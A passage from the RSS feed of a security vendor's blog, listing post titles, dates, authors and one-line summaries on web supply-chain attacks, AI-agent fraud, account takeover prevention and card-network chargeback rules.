isPermaLink="true">https://cside.com/blog/polyfill-io-supply-chain-attack-timeline</guid><description>A web supply chain attack turns trusted third-party code against visitors. See how the Polyfill.io attack hit 490,000+ sites and what it teaches about JavaScript supply chain risk.</description><pubDate>Sun, 14 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Web+Supply+Chain+Attack+Explained%3A+The+Polyfill.io+Incident%2C+Full+Timeline+%26+Lessons+%282024-2026%29&amp;bannerTitle=Web+Supply+Chain+Attack%3A+Polyfill.io+Case+Study&amp;point=What+a+web+supply+chain+attack+is+%28and+how+polyfill.io+proves+the+model%29&amp;point=490%2C000%2B+sites+hit%3A+the+true+scale%2C+not+the+100k+headline&amp;point=Full+timeline%3A+2024+attack+to+2025+OFAC+sanctions" length="0" type="image/webp"/></item><item><title>How to Block AI Card-Testing Agents</title><link>https://cside.com/blog/how-to-block-ai-card-testing-agents</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-ai-card-testing-agents</guid><description>AI card-testing agents probe payment flows using real browsers. Learn the browser signals that expose them before a transaction completes.</description><pubDate>Sat, 13 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2026/06/How-to-Block-AI-Card-Testing-Agents---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>How to Choose an AI Agent Detection Solution</title><link>https://cside.com/blog/how-to-choose-ai-agent-detection-solution</link><guid isPermaLink="true">https://cside.com/blog/how-to-choose-ai-agent-detection-solution</guid><description>A five-step buying guide for CISOs evaluating AI agent detection solutions: architecture, classification, vendor profiles, and POC methodology.</description><pubDate>Fri, 12 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/how-to-choose-agent-image.webp" length="0" type="image/webp"/></item><item><title>Anti-bot software: how it works and 5 platforms compared</title><link>https://cside.com/blog/anti-bot-software</link><guid isPermaLink="true">https://cside.com/blog/anti-bot-software</guid><description>Anti-bot software blocks scrapers, credential stuffers, and AI agents. Five platforms compared on detection layer, intent, and agentic coverage.</description><pubDate>Thu, 11 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2026/06/Best-Bot-and-Agent-Trust-Management-Platforms-Compared---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>How to Block OpenAI Operator on Your Website</title><link>https://cside.com/blog/how-to-block-openai-operator</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-openai-operator</guid><description>OpenAI Operator browses your site like a real user. Learn how to detect and block it using browser-layer signals and when you should not block it.</description><pubDate>Wed, 10 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/block-openai-operator-cover.webp" length="0" type="image/webp"/></item><item><title>DBSC vs Device Fingerprinting: What Chrome&apos;s Session Security Does Not Cover</title><link>https://cside.com/blog/dbsc-vs-device-fingerprinting</link><guid isPermaLink="true">https://cside.com/blog/dbsc-vs-device-fingerprinting</guid><description>Chrome&apos;s DBSC stops stolen-cookie replay, but it is Chrome-only, post-login, and not a device-identity layer. Here is the fraud it leaves open.</description><pubDate>Tue, 09 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=DBSC+vs+Device+Fingerprinting%3A+What+Chrome%27s+Session+Security+Does+Not+Cover&amp;bannerTitle=DBSC+vs+device+fingerprinting&amp;point=DBSC+is+Chrome-only+and+post-login&amp;point=It+binds+the+attacker%27s+device+too&amp;point=Fingerprinting+covers+what+DBSC+cannot" length="0" type="image/webp"/></item><item><title>How to Block Perplexity Shopper on Your Website</title><link>https://cside.com/blog/how-to-block-perplexity-shopper</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-perplexity-shopper</guid><description>Perplexity Shopper browses and buys from retail websites on behalf of Pro users. Learn how to detect its browser-layer signals and govern the traffic.</description><pubDate>Tue, 09 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/block-perplexity-shopper-cover.webp" length="0" type="image/webp"/></item><item><title>AI API security: when shared infrastructure returns another user&apos;s data</title><link>https://cside.com/blog/ai-api-shared-cache-data-leaks</link><guid isPermaLink="true">https://cside.com/blog/ai-api-shared-cache-data-leaks</guid><description>Shared caches, connection pools, and request routers make AI API security hard. Here&apos;s how cross-tenant response bleed happens and what to monitor in the browser.</description><pubDate>Fri, 05 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>News</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/ai-api-shared-cache-data-leaks-cover.webp" length="0" type="image/webp"/></item><item><title>MFA Didn&apos;t Fail, the Trust Model Did: Device Code Phishing and OAuth Token Theft (Kali365)</title><link>https://cside.com/blog/mfa-token-theft-device-code-phishing-trust-model</link><guid isPermaLink="true">https://cside.com/blog/mfa-token-theft-device-code-phishing-trust-model</guid><description>Kali365 abuses the OAuth 2.0 device authorization grant to steal Microsoft 365 tokens after MFA. A technical breakdown of the flow, FOCI, and detection.</description><pubDate>Fri, 05 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/mfa-token-theft-device-code-phishing-trust-model.webp" length="0" type="image/webp"/></item><item><title>AI is compressing the exploit cycle: Google&apos;s AI-developed zero-day and what it means for browsers</title><link>https://cside.com/blog/ai-exploit-cycle-compression-browser-zero-days</link><guid isPermaLink="true">https://cside.com/blog/ai-exploit-cycle-compression-browser-zero-days</guid><description>Google flagged a zero-day it believes was AI-developed. The real AI security shift isn&apos;t smarter phishing, it&apos;s how fast exploits reach the browser.</description><pubDate>Wed, 03 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/ai-exploit-cycle-compression-browser-zero-days-cover.webp" length="0" type="image/webp"/></item><item><title>The Browser Session Is Now a Security Control Plane. Attackers Knew That Years Ago.</title><link>https://cside.com/blog/browser-session-security-control-plane-dbsc</link><guid isPermaLink="true">https://cside.com/blog/browser-session-security-control-plane-dbsc</guid><description>Google&apos;s DBSC proposal validates a clear security shift: browser sessions need device-aware validation after login, not only MFA.</description><pubDate>Sat, 30 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/browser-session-security-control-plane-dbsc.webp" length="0" type="image/webp"/></item><item><title>Account Takeover Prevention Software: 10 Tools for 2026</title><link>https://cside.com/blog/top-account-takeover-prevention-solutions-selection-guide</link><guid isPermaLink="true">https://cside.com/blog/top-account-takeover-prevention-solutions-selection-guide</guid><description>Compare account takeover prevention software by defense layer: fingerprinting (cside), fraud suites (Sift), MFA (Okta). Find which layer your stack is missing.</description><pubDate>Wed, 27 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Account+Takeover+Prevention+Software%3A+10+Tools+for+2026&amp;bannerTitle=Account+takeover+prevention+software&amp;point=10+ATO+prevention+tools+compared&amp;point=Why+MFA+is+not+enough+to+stop+ATO&amp;point=How+to+pick+by+defense+layer" length="0" type="image/webp"/></item><item><title>How to Stop AI Agents From Creating Fake Accounts with Signup Shield (Guide)</title><link>https://cside.com/blog/signup-shield-stop-ai-agents-fake-accounts</link><guid isPermaLink="true">https://cside.com/blog/signup-shield-stop-ai-agents-fake-accounts</guid><description>AI agents create fake accounts using real browsers, residential IPs, and generated identities. Here&apos;s the detection signal stack to stop them.</description><pubDate>Wed, 20 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Stop+AI+Agents+From+Creating+Fake+Accounts+with+Signup+Shield+%28Guide%29&amp;bannerTitle=Stop+AI+Fake+Account+Creation&amp;point=Identity%2C+network%2C+browser%2C+and+behavioral+signals&amp;point=Why+CAPTCHA+fails+against+AI+agents&amp;point=Enforcement+strategies+that+work" length="0" type="image/webp"/></item><item><title>How to Block AI-Agent Based Content Scraping Bots (Guide)</title><link>https://cside.com/blog/guide-to-blocking-ai-agent-content-scraping-bots</link><guid isPermaLink="true">https://cside.com/blog/guide-to-blocking-ai-agent-content-scraping-bots</guid><description>AI content scraping bots use real browsers, residential IPs, and LLM-powered extraction to harvest your pricing and content. Here&apos;s how to stop them.</description><pubDate>Tue, 19 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/images/ai-content-scraper-blocking-detection-strategies-5760x3240.webp" length="0" type="image/webp"/></item><item><title>The Snowball Effect: How Mini Shai-Hulud Turns npm into a Worm Distribution Network</title><link>https://cside.com/blog/mini-shai-hulud-npm-worm-snowball-effect</link><guid isPermaLink="true">https://cside.com/blog/mini-shai-hulud-npm-worm-snowball-effect</guid><description>Mini Shai-Hulud turned npm packages into a credential-theft loop. Here is how the AntV wave spread and what teams should monitor next.</description><pubDate>Tue, 19 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/mini-shai-hulud-npm-worm-banner.webp" length="0" type="image/webp"/></item><item><title>Why CAPTCHAs Are No Longer Reliable Bot Defense</title><link>https://cside.com/blog/why-captchas-are-dead</link><guid isPermaLink="true">https://cside.com/blog/why-captchas-are-dead</guid><description>CAPTCHAs are no longer a reliable primary bot defense. Learn why visible challenges fail and how resource-wasting defenses raise attacker cost.</description><pubDate>Tue, 19 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/why-captchas-are-dead-cside.webp" length="0" type="image/webp"/></item><item><title>Funnull Sanctioned: What the Polyfill[.]io Attack Exposed About Infrastructure Laundering</title><link>https://cside.com/blog/funnull-sanctioned-polyfill-infrastructure-laundering</link><guid isPermaLink="true">https://cside.com/blog/funnull-sanctioned-polyfill-infrastructure-laundering</guid><description>OFAC&apos;s Funnull sanctions show why the Polyfill attack was part of a larger infrastructure laundering and browser supply-chain risk.</description><pubDate>Mon, 18 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/funnull-sanctioned-polyfill-infrastructure-laundering-banner.webp" length="0" type="image/webp"/></item><item><title>On-Device Inference Is Coming for Your Security Stack: For Better and Worse</title><link>https://cside.com/blog/on-device-inference-security-stack</link><guid isPermaLink="true">https://cside.com/blog/on-device-inference-security-stack</guid><description>On-device AI can protect sensitive data and power endpoint defense, but it also creates new prompt injection, telemetry, and browser attack paths.</description><pubDate>Mon, 18 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/on-device-inference-security-stack-banner.webp" length="0" type="image/webp"/></item><item><title>4 Tools To Detect AI Agents On Your Website (Fraud Prevention)</title><link>https://cside.com/blog/best-tools-for-ai-agent-detection-to-prevent-website-fraud</link><guid isPermaLink="true">https://cside.com/blog/best-tools-for-ai-agent-detection-to-prevent-website-fraud</guid><description>Compare cside, HUMAN Security, DataDome, and Cloudflare for AI agent detection. See how each tool handles fraud prevention, pricing, and implementation.</description><pubDate>Fri, 15 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/comparing-tools-to-detect-ai-agents-on-your-website-cside.webp" length="0" type="image/webp"/></item><item><title>AI-Agent Based Credit Card Testing Bots | How to Stop Them</title><link>https://cside.com/blog/how-to-block-ai-credit-card-testing-agents</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-ai-credit-card-testing-agents</guid><description>AI credit card testing agents use real browsers to test stolen credentials at scale. Learn how to detect and block them before a transaction completes.</description><pubDate>Fri, 15 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/block-ai-agent-credit-card-testing-bots-cside.png" length="0" type="image/png"/></item><item><title>What Are Stealth (or &apos;Anti-Detect&apos;) Browsers and When to Block Them</title><link>https://cside.com/blog/stealth-browsers-and-anti-detect-browsers-explained</link><guid isPermaLink="true">https://cside.com/blog/stealth-browsers-and-anti-detect-browsers-explained</guid><description>Stealth browsers bypass bot detection. Anti-detect browsers spoof fingerprints. Learn the signals that reveal both, even when they look human.</description><pubDate>Thu, 14 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/stealth-browsers-and-anti-detect-browsers-explained-feature.webp" length="0" type="image/webp"/></item><item><title>cside Named SourceForge Spring 2026 Top Performer for Client-Side Security</title><link>https://cside.com/blog/cside-sourceforge-spring-2026-top-performer</link><guid isPermaLink="true">https://cside.com/blog/cside-sourceforge-spring-2026-top-performer</guid><description>cside was named a SourceForge Spring 2026 Top Performer, based on user trust in client-side security, PCI evidence, and support.</description><pubDate>Wed, 13 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/cside-sourceforge-banner.webp" length="0" type="image/webp"/></item><item><title>How to Detect AI Agents on Your Website | Full Guide</title><link>https://cside.com/blog/guide-to-detect-ai-agent-traffic-on-your-website</link><guid isPermaLink="true">https://cside.com/blog/guide-to-detect-ai-agent-traffic-on-your-website</guid><description>How to detect AI agent traffic through identity, network, browser, and behavioral signals: free log analysis plus specialized tools.</description><pubDate>Wed, 13 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/how-to-detect-ai-agents-on-your-website-cover.webp" length="0" type="image/webp"/></item><item><title>cside Co-Chairs W3C Anti-Fraud Browser Security</title><link>https://cside.com/blog/cside-w3c-anti-fraud-community-group-browser-security</link><guid isPermaLink="true">https://cside.com/blog/cside-w3c-anti-fraud-community-group-browser-security</guid><description>Simon Wijckmans now co-chairs W3C AFCG as cside helps shape privacy-preserving browser signals for AI-era fraud.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/w3c-anti-fraud-community-group-browser-security-og.webp" length="0" type="image/webp"/></item><item><title>What Is Mastercard First-Party Trust? How It Reduces Chargebacks</title><link>https://cside.com/blog/mastercard-fpt-how-it-reduces-chargebacks</link><guid isPermaLink="true">https://cside.com/blog/mastercard-fpt-how-it-reduces-chargebacks</guid><description>Mastercard First-Party Trust deflects friendly fraud disputes before they become formal chargebacks. Here is how the evidence framework works.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/mastercard-fpt-cover-1.5x.webp" length="0" type="image/webp"/></item><item><title>Mastercard First Party Trust: Improve EFM and ECP Ratios with Device Fingerprinting</title><link>https://cside.com/blog/mastercard-fpt-device-fingerprinting-to-improve-efm-and-ecp</link><guid isPermaLink="true">https://cside.com/blog/mastercard-fpt-device-fingerprinting-to-improve-efm-and-ecp</guid><description>Mastercard&apos;s First Party Trust program uses device fingerprinting to deflect friendly fraud disputes before they inflate your EFM and ECP ratios.</description><pubDate>Fri, 08 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/mastercard-fpt-cover-1920x1080.webp" length="0" type="image/webp"/></item><item><title>PCI DSS 6.4.3 &amp; 11.6.1 Compliance Tools: 2026 Comparison</title><link>https://cside.com/blog/solution-comparison-pci-dss-6-4-3-and-11-6-1</link><guid isPermaLink="true">https://cside.com/blog/solution-comparison-pci-dss-6-4-3-and-11-6-1</guid><description>Compare PCI DSS 6.4.3 and 11.6.1 compliance tools: features, pricing, and reviews for cside, Feroot, Cloudflare, Reflectiz, and DomDog side by side.</description><pubDate>Thu, 07 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/comparing-solutions-pci-dss-6-4-3-11-6-1-cside.webp" length="0" type="image/webp"/></item><item><title>Friendly Fraud in Travel and Hospitality: The 2026 Playbook</title><link>https://cside.com/blog/friendly-fraud-travel-hospitality-playbook</link><guid isPermaLink="true">https://cside.com/blog/friendly-fraud-travel-hospitality-playbook</guid><description>Travel and hospitality merchants face the highest-value friendly fraud disputes. How CE 3.0 and browser-layer evidence rebalance the win rate.</description><pubDate>Wed, 06 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/friendly-fraud-travel-hospitality-playbook-og.webp" length="0" type="image/webp"/></item><item><title>Mastercard Scam Merchant Monitoring: SMMP Enforcement Active, What Merchants Must Do Now</title><link>https://cside.com/blog/mastercard-scam-merchant-monitoring-2026</link><guid isPermaLink="true">https://cside.com/blog/mastercard-scam-merchant-monitoring-2026</guid><description>Mastercard SMMP is 30+ days into active enforcement. Which merchants face investigation risk now, what the 72-hour acquirer window means in practice, and how to close the evidence gap before the next trigger fires.</description><pubDate>Tue, 05 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/mastercard-scam-merchant-monitoring-2026-og.webp" length="0" type="image/webp"/></item><item><title>Utah SB 73: You Are Now Liable for Users&apos; VPNs</title><link>https://cside.com/blog/utah-sb73-vpn-age-verification-compliance</link><guid isPermaLink="true">https://cside.com/blog/utah-sb73-vpn-age-verification-compliance</guid><description>Utah SB 73 holds operators liable when users bypass age gates with VPNs. An IP blocklist cannot keep pace. Behavioural detection is what works.</description><pubDate>Tue, 05 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/utah-sb73-vpn-detection-age-verification-blog-cover-cside.webp" length="0" type="image/webp"/></item><item><title>CE 3.0 Auto-Qualification: What Changed on 17 October 2025 and What To Do Now</title><link>https://cside.com/blog/ce-3-auto-qualification-visa-secure</link><guid isPermaLink="true">https://cside.com/blog/ce-3-auto-qualification-visa-secure</guid><description>Visa auto-qualifies transactions for Compelling Evidence 3.0 via Visa Secure and Visa Data Only. What changed, who benefits, and the evidence gap.</description><pubDate>Fri, 01 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/ce-3-auto-qualification-visa-secure-og.webp" length="0" type="image/webp"/></item><item><title>Friendly Fraud in Gaming and iGaming: The 2026 Chargeback Playbook</title><link>https://cside.com/blog/friendly-fraud-gaming-igaming-playbook</link><guid isPermaLink="true">https://cside.com/blog/friendly-fraud-gaming-igaming-playbook</guid><description>iGaming merchants run the highest chargeback ratios of any vertical. VAMP 2026 tightened the line. How CE 3.0 plus browser-layer evidence rebalances the book.</description><pubDate>Wed, 29 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/friendly-fraud-gaming-igaming-playbook-og.webp" length="0" type="image/webp"/></item><item><title>VAMP Thresholds 2026: Ratio Formula, Rules, and Merchant Survival Guide</title><link>https://cside.com/blog/vamp-2026-merchant-playbook</link><guid isPermaLink="true">https://cside.com/blog/vamp-2026-merchant-playbook</guid><description>Visa VAMP thresholds tightened to 1.5% on 1 April 2026: $8-per-transaction fines, no warning tier. How to calculate the VAMP ratio and use CE 3.0.</description><pubDate>Wed, 29 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/vamp-2026-merchant-playbook-og.webp" length="0" type="image/webp"/></item><item><title>Compelling Evidence 3.0 Requirements: What Visa Mandates and What Actually Wins the Case</title><link>https://cside.com/blog/compelling-evidence-3-requirements-data-points</link><guid isPermaLink="true">https://cside.com/blog/compelling-evidence-3-requirements-data-points</guid><description>The four data elements Visa requires for CE 3.0, and what separates winning representments from losing ones.</description><pubDate>Tue, 28 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/compelling-evidence-3-requirements-data-points-og.webp" length="0" type="image/webp"/></item><item><title>How OpenClaw Agents Bypass Bot Detection (And How to Stop Them)</title><link>https://cside.com/blog/how-openclaw-agents-bypass-bot-detection</link><guid isPermaLink="true">https://cside.com/blog/how-openclaw-agents-bypass-bot-detection</guid><description>OpenClaw agents paired with stealth browser tooling can bypass legacy bot detection. Learn how agentic fraud works and how browser fingerprinting helps stop it.</description><pubDate>Tue, 28 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/banner-openclaw.png" length="0" type="image/png"/></item><item><title>CTEM at the browser layer: one third-party script, five findings</title><link>https://cside.com/blog/ctem-browser-enforcement</link><guid isPermaLink="true">https://cside.com/blog/ctem-browser-enforcement</guid><description>A live analysis of one Skeepers widget on a major international bank surfaced a 360-day cookie on auth subdomains, a CSP gap, and a server-controlled sub-script. Here&apos;s what CTEM looks like applied to the browser layer.</description><pubDate>Mon, 27 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/ctem-browser-enforcement-og.png" length="0" type="image/png"/></item><item><title>Friendly Fraud in SaaS and Subscription Businesses: The 2026 Playbook</title><link>https://cside.com/blog/friendly-fraud-saas-subscription-playbook</link><guid isPermaLink="true">https://cside.com/blog/friendly-fraud-saas-subscription-playbook</guid><description>SaaS friendly fraud has its own shape: descriptor drift, recurring billing, CE 3.0 eligibility. Here&apos;s how to fight it in 2026.</description><pubDate>Mon, 27 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/friendly-fraud-saas-subscription-playbook-og.png" length="0" type="image/png"/></item><item><title>Best account sharing prevention software: comparing tools for businesses</title><link>https://cside.com/blog/comparing-account-sharing-prevention-tools-for-businesses</link><guid isPermaLink="true">https://cside.com/blog/comparing-account-sharing-prevention-tools-for-businesses</guid><description>SaaS teams lose revenue to account sharing daily. Compare the best account sharing prevention software by features, pricing, and reviews.</description><pubDate>Thu, 23 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/Comparing-Tools-That--Prevent-Account-Sharing---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>How to prevent account sharing fraud (full guide for businesses)</title><link>https://cside.com/blog/prevent-account-sharing-full-guide-for-businesses</link><guid isPermaLink="true">https://cside.com/blog/prevent-account-sharing-full-guide-for-businesses</guid><description>Account sharing costs organizations billions in revenue loss. This guide covers prevention methods like device and session limits, as well as strategic tips.</description><pubDate>Wed, 22 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/Full-Guide_-How-to-Prevent-Account-Sharing-Fraud---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>How to Remove a TC40 from Your VAMP Ratio: The CE 3.0 Mechanic</title><link>https://cside.com/blog/how-to-remove-tc40-via-compelling-evidence-3</link><guid isPermaLink="true">https://cside.com/blog/how-to-remove-tc40-via-compelling-evidence-3</guid><description>TC40 fraud reports feed your VAMP ratio without a chargeback. A successful CE 3.0 representment is the only way to remove one. Here&apos;s how it works.</description><pubDate>Tue, 21 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/how-to-remove-tc40-via-compelling-evidence-3-og.webp" length="0" type="image/webp"/></item><item><title>7 steps to stop account takeover fraud (for Travel businesses)</title><link>https://cside.com/blog/proven-tips-to-stop-account-takeover-fraud-travel-websites</link><guid isPermaLink="true">https://cside.com/blog/proven-tips-to-stop-account-takeover-fraud-travel-websites</guid><description>MFA is bypassed by advanced phishing kits. See the best practices, fingerprint signals, and tools that Travel fraud teams actually use to stop ATO.</description><pubDate>Sun, 19 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/7-Steps-for-Travel-Website-Teams-to-Stop-ATO-Fraud---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>Quick guide to prevent Account Takeover fraud (crypto businesses)</title><link>https://cside.com/blog/quick-guide-to-prevent-account-takeover-fraud-crypto-websites</link><guid isPermaLink="true">https://cside.com/blog/quick-guide-to-prevent-account-takeover-fraud-crypto-websites</guid><description>Crypto accounts are the most valuable ATO target of any industry. See the best practices, fingerprint signals, and tools Crypto teams use to stop ATO.</description><pubDate>Fri, 17 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/Best-Practices-for-Crypto-Teams-to-Stop-ATO-Fraud---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>How Advanced Location Data Prevents Account Takeover and Detects Unsafe AI-Agent Token Reuse</title><link>https://cside.com/blog/advanced-location-data-account-takeover-ai-agent-token-reuse</link><guid isPermaLink="true">https://cside.com/blog/advanced-location-data-account-takeover-ai-agent-token-reuse</guid><description>How advanced location data helps security teams detect impossible travel, stolen-session reuse, and unsafe AI-agent activity before account takeover turns into fraud or data loss.</description><pubDate>Wed, 15 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://files.manuscdn.com/user_upload_by_module/session_file/310519663253463647/BRXVwNletTJpbyiJ.png" length="0" type="image/png"/></item><item><title>How Compromised Third-Party Scripts Can Prompt-Inject AI Agents</title><link>https://cside.com/blog/how-compromised-third-party-scripts-can-prompt-inject-ai-agents</link><guid isPermaLink="true">https://cside.com/blog/how-compromised-third-party-scripts-can-prompt-inject-ai-agents</guid><description>Third-party scripts already adapt website behavior by browser characteristics. That same flexibility can be abused to detect AI agents and inject misleading instructions or altered content.</description><pubDate>Mon, 13 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/cside_ai_agent_prompt_injection_banner_v1.webp" length="0" type="image/webp"/></item><item><title>Best methods to prevent account takeover fraud  (FinTech)</title><link>https://cside.com/blog/best-methods-to-prevent-account-takeover-fraud-fintech</link><guid isPermaLink="true">https://cside.com/blog/best-methods-to-prevent-account-takeover-fraud-fintech</guid><description>FinTech accounts are targeted daily by attackers. See the best practices, fingerprint signals, and prevention tools FinTech teams use to stop ATO.</description><pubDate>Fri, 10 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/Best-Practices-for-FinTech-Teams-to-Stop-ATO-Fraud---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>Best practices to prevent account takeover fraud (eCommerce)</title><link>https://cside.com/blog/ecommerce-best-practices-to-prevent-account-takeover-fraud</link><guid isPermaLink="true">https://cside.com/blog/ecommerce-best-practices-to-prevent-account-takeover-fraud</guid><description>eCommerce accounts are targeted daily by attackers. See the best practices, fingerprint signals, and prevention tools eCom companies use to stop ATO.</description><pubDate>Wed, 08 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/Best-Practices-for-eCommerce-Merchants-to-Stop-ATO-Fraud---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>Account Takeover Fraud Prevention: The Complete 2026 Guide</title><link>https://cside.com/blog/account-takeover-fraud-prevention</link><guid isPermaLink="true">https://cside.com/blog/account-takeover-fraud-prevention</guid><description>MFA helps, but it does not stop account takeover on its own. This guide covers how businesses can prevent ATO early with fingerprinting signals.</description><pubDate>Tue, 07 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2026/04/How-to-Prevent-Account-Takeover-Fraud---cside-blog-cover.webp" length="0" type="image/webp"/></item><item><title>Meet cside at RSAC 2026</title><link>https://cside.com/blog/meet-cside-at-rsac-2026</link><guid isPermaLink="true">https://cside.com/blog/meet-cside-at-rsac-2026</guid><description>Meet the cside time at RSAC 2026 in San Francisco. Stop by our booth S-0238 on March 24-26 or grab time with us off the floor.</description><pubDate>Mon, 23 Mar 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/cside-at-RSAC-2026---blog-cover---2--1-.png" length="0" type="image/png"/></item><item><title>DarkSword: pure JavaScript exploit chain weaponizes legitimate websites</title><link>https://cside.com/blog/darksword-pure-javascript-exploit-chain-weaponizes-legitimate-websites</link><guid isPermaLink="true">https://cside.com/blog/darksword-pure-javascript-exploit-chain-weaponizes-legitimate-websites</guid><description>DarkSword is a full-chain iOS exploit delivered via watering-hole compromises of legitimate websites. It runs entirely in JavaScript, evades binary mitigations, and drops JavaScript-based backdoors that exfiltrate sensitive data.</description><pubDate>Fri, 20 Mar 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/03/darksword_banner.webp" length="0" type="image/webp"/></item><item><title>AppsFlyer Web SDK supply-chain compromise - polymorphic crypto stealer</title><link>https://cside.com/blog/appsflyer-web-sdk-supply-chain-compromise-polymorphic-crypto-stealer</link><guid isPermaLink="true">https://cside.com/blog/appsflyer-web-sdk-supply-chain-compromise-polymorphic-crypto-stealer</guid><description>A registrar-level DNS hijack of appsflyer.com served a polymorphic crypto-stealing payload through the AppsFlyer Web SDK and affected thousands of sites and some Node.js server environments. This post summarizes telemetry, forensic indicators, IOCs, detection guidance, and remediation 